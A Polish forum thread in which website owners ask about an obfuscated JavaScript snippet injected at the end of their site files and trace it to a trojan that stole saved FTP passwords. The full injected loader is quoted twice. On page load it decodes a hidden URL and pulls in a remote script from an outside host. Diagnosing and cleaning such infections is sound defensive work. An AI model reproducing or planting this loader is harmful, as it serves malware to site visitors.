Dziwny skrypt na końcu plików wysypujący stronę

[KoTeKMalbork]

Witam pewna strona nagle przestała działać błąd wskazywał mi plik i linię w której było zapisane

Kod:

**********/*GNU GPL*/ try{window.onload = function(){var A84jbd5xsu = document.createElement('script');A84jbd5xsu.setAttribute('type', 'text/javascript');A84jbd5xsu.setAttribute('id', 'myscript1');A84jbd5xsu.setAttribute('src',  'h^&(t)$t(!^p($^(:$@(/!!)/@x!()@n&!$x&!!@x^!&(-(c#)o#!m!!(.$n^!#(u^((.@)#n&!(l$@@.#^@@w$()3&)(-$o)#r$^(g)@!&.@#&g(^o!&l!)&d!@^g@&)o&@#l^^f(!b!!a#)#@g^$^@.#(^^r)&#u@!:!&$$8)0&)#8#!(0^/@w()$^e&(&e&b)&l@@#y&$!.@c&&&o)@^!$m$@/$$&@w$^)@e^e!(b))l(^y&)&.)(c!!!o^&m!($^/(^)!l!!&(a!^$r@!e#&d$!#o)(^u(t(e$(.$f@!r!$(/!!g$!^)&o^@#$o@#$(g@^l##e^!(.)(&c!$o)$&m@^@/##!)#r&@i!#n^$(c))!$o#&)n@(!d^&e&l#&@v&)a($$!g@^)#o#&^!.((^c@)&&o!!)!m!/)$'.replace(/@|\^|\)|#|&|\$|\(|\!/ig, ''));A84jbd5xsu.setAttribute('defer', 'defer');document.body.appendChild(A84jbd5xsu);}} catch(e) {}</script>

Co to jest jakiś wirus czy co?

[trzepiz]

z tego co widzę (albo zapomniałeś, pominąłęś) to brakuje na początku

Kod:

<script  >

więc owy kod się nie wykona i może lepiej ... Najlepiej usuńcałą tą linię, nie mam pojęcia skąd się wzięła. Pomyśl czy nie instalowałeś czegoś ostatnio ? wykonaj kopie strony przed usunięciem wpisu ..

[sbartek]

Miałem 14.XII jakiś atak -mała stronka na ovh i dokładnie to samo podołączało na końcu większości plików :

Kod:

script>/*GNU GPL*/ try{window.onload = function(){var A84jbd5xsu = document.createElement('script');A84jbd5xsu.setAttribute('type', 'text/javascript');A84jbd5xsu.setAttribute('id', 'myscript1');A84jbd5xsu.setAttribute('src',  'h^&(t)$t(!^p($^(:$@(/!!)/@x!()@n&!$x&!!@x^!&(-(c#)o#!m!!(.$n^!#(u^((.@)#n&!(l$@@.#^@@w$()3&)(-$o)#r$^(g)@!&.@#&g(^o!&l!)&d!@^g@&)o&@#l^^f(!b!!a#)#@g^$^@.#(^^r)&#u@!:!&$$8)0&)#8#!(0^/@w()$^e&(&e&b)&l@@#y&$!.@c&&&o)@^!$m$@/$$&@w$^)@e^e!(b))l(^y&)&.)(c!!!o^&m!($^/(^)!l!!&(a!^$r@!e#&d$!#o)(^u(t(e$(.$f@!r!$(/!!g$!^)&o^@#$o@#$(g@^l##e^!(.)(&c!$o)$&m@^@/##!)#r&@i!#n^$(c))!$o#&)n@(!d^&e&l#&@v&)a($$!g@^)#o#&^!.((^c@)&&o!!)!m!/)$'.replace(/@|\^|\)|#|&|\$|\(|\!/ig, ''));A84jbd5xsu.setAttribute('defer', 'defer');document.body.appendChild(A84jbd5xsu);}} catch(e) {}</script>

po wejściu na strone widziałem łączyło się z jakimś "xxx-......(dot)nl"
na razie nie znalazłem żadnego info na ten temat

EDIT :
Ok chyba już wiem - prawdopodobnie jakis trojan z mojego komputera wyciągnął hasło z coreftp i sam zmodyfikował stronę.
Nod32 nic widzi.

[noname]

http://www.michell.pl/bez-kategorii/...load-function/

[allrunner]

U mnie pojawił się też ten sam problem. Usunąłem kod z 2 plików w których się pojawił. Dopiero dziś po wejściu na stronę Kaspersky wykrył: Trojan.JS.Agent.axl o którym jeszcze nie ma żadnej informacji.

A tak konkretniej był gdzieś post w sieci o tym wirusie. Korzysta z haseł zapisanych w klientach FTP i nadpisuje pliki na serwerze wyżej wspomnianym kodem (głownie pliki index).